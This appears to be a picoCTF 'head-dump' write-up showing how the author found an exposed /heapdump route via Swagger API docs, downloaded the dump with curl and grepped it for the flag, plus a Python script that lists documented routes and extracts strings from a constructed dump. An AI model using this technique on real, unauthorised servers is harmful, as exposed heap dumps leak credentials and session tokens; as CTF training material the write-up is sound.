Christopher Ferrari

picoCTF: head-dump — Writeup

Published on June 4, 2025

Challenge: picoCTF: head-dump

Difficulty: Easy

This challenge involved a web app with an embedded flag hidden in a server memory dump. The description made a direct reference to "API Documentation," which wasn’t just fluff — it was a roadmap.

Initial Analysis

I opened the site and skipped the guesswork: with the browser dev tools open, I searched the page source for patterns like /api, /docs, or anything else that hinted at internal routing.

My Theory

They called out API documentation in the challenge. That means they *wanted* me to find the docs. If it's a modern web app, there's probably a Swagger-style endpoint revealing all routes — including a potential heap/memory dump endpoint.

Discovery Process

Searched the source with Ctrl+F. Hit on a goldmine:

/api-docs/#/

That link took me to a full API documentation interface. In it, I found:

GET /heapdump

No need to guess. This route was literally handed to me. I hit it directly:

curl -o heapdump http://<target>/heapdump   # -o writes the response body to a file instead of the terminal

The response was a raw memory dump. With it saved as heapdump, I pulled out the printable strings and searched them for the flag format:

strings heapdump > parsed.txt
grep picoCTF parsed.txt

Found the flag hidden in the dump.
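The same two steps, enumerating the documented routes and then triaging the dump for the flag, as an added example in Python rather than the shell one-liners used above. This is not the challenge's code or the author's: the OpenAPI document and the heap dump bytes are constructed inline (the /api/users and /api/login paths are hypothetical), and the string extraction reimplements what strings(1) does so the script runs offline without a target.

```python
import json
import re

# Constructed sample of an OpenAPI document, standing in for what /api-docs served.
# Every path except /heapdump is hypothetical.
SAMPLE_OPENAPI = json.dumps({
    "openapi": "3.0.0",
    "info": {"title": "sample", "version": "1.0"},
    "paths": {
        "/api/users": {"get": {"summary": "List users"}},
        "/api/login": {"post": {"summary": "Log in"}},
        "/heapdump": {"get": {"summary": "Download a heap snapshot"}},
    },
})

# Constructed stand-in for a heap dump: binary noise with a few printable runs,
# including a session value and a flag in the picoCTF{...} format.
SAMPLE_HEAPDUMP = (
    b"\x00\x00\x7f\x01"
    + b"Object.prototype" + b"\x00" * 6
    + b"session=9f3c" + b"\x00\x00"
    + b"picoCTF{constructed_example_flag}" + b"\x00\xff"
    + b"\x01\x02\x03"
)

HTTP_METHODS = {"get", "post", "put", "patch", "delete", "head", "options"}

# Path fragments that usually mark diagnostic or debug endpoints that should
# not be reachable in production (assumed list, extend as needed).
SENSITIVE_HINTS = ("heapdump", "dump", "debug", "env", "actuator", "trace", "admin")

FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")


def list_routes(spec_text):
    """Return sorted (METHOD, path) pairs from an OpenAPI 3 / Swagger 2 'paths' object."""
    spec = json.loads(spec_text)
    routes = []
    for path, operations in spec.get("paths", {}).items():
        for method in operations:
            if method.lower() in HTTP_METHODS:
                routes.append((method.upper(), path))
    return sorted(routes)


def sensitive_routes(routes):
    """Keep routes whose path contains one of SENSITIVE_HINTS (case-insensitive)."""
    return [r for r in routes if any(h in r[1].lower() for h in SENSITIVE_HINTS)]


def extract_strings(blob, min_len=4):
    """Same idea as strings(1): runs of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_flags(blob):
    """Run the flag regex over every printable run found in the dump."""
    found = set()
    for s in extract_strings(blob):
        found.update(FLAG_RE.findall(s))
    return sorted(found)


if __name__ == "__main__":
    routes = list_routes(SAMPLE_OPENAPI)
    print("documented routes:", routes)
    print("worth a closer look:", sensitive_routes(routes))
    print("flags in dump:", find_flags(SAMPLE_HEAPDUMP))
```

Against a live target you would replace SAMPLE_OPENAPI with the JSON behind the Swagger UI and SAMPLE_HEAPDUMP with the bytes returned by the dump route; the triage logic is the same.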

Flag: picoCTF{...}

Key Takeaway

The API doc mention was the entire playbook. Don’t ignore those “details” in challenge descriptions — they’re often the answer key. Go to the source, look at what the devs left behind, and always assume structure over randomness. Systematic beats blind guessing. The lesson carries outside the CTF too: a heap dump contains whatever the process held in memory at that moment, so a diagnostic route like /heapdump that is reachable without authentication, and advertised in the API documentation, hands over credentials, session tokens and application secrets in a single request.